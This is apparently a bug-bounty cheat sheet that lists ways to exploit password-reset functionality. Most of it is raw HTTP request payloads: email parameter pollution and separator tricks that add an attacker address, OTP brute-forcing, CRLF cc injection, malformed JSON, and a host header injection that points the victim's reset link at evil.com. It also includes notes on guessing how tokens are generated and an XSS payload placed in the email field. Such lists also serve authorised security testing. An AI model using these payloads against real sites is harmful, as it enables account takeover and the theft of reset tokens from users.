Forgot Password

Forgot Password Functionality

Introduction

Some common bugs in the forgot password / reset password functionality

How to exploit

1. Parameter pollution

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com&email=hacker@mail.com

1. Bruteforce the OTP code

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com&code=$123456$

1. Host header Injection

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com

to

POST /reset HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
...

email=victim@mail.com

And the victim will receive the reset link with evil.com

1. Using separator in value of the parameter

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com,hacker@mail.com

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com%20hacker@mail.com

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com|hacker@mail.com

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com%00hacker@mail.com

1. No domain in value of the paramter

POST /reset HTTP/1.1
Host: target.com
...

email=victim

1. No TLD in value of the parameter

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail

1. Using carbon copy

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com%0a%0dcc:hacker@mail.com

1. If there is JSON data in body requests, add comma

POST /newaccount HTTP/1.1
Host: target.com
...

{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"}

1. Find out how the tokens generate

• Generated based on TimeStamp

• Generated based on the ID of the user

• Generated based on the email of the user

• Generated based on the name of the user

1. Try Cross-Site Scripting (XSS) in the form

Sometimes the email is reflected in the forgot password page, try to use XSS payload

"<svg/onload=alert(1)>"@gmail.com

References

• anugrahsr

• Frooti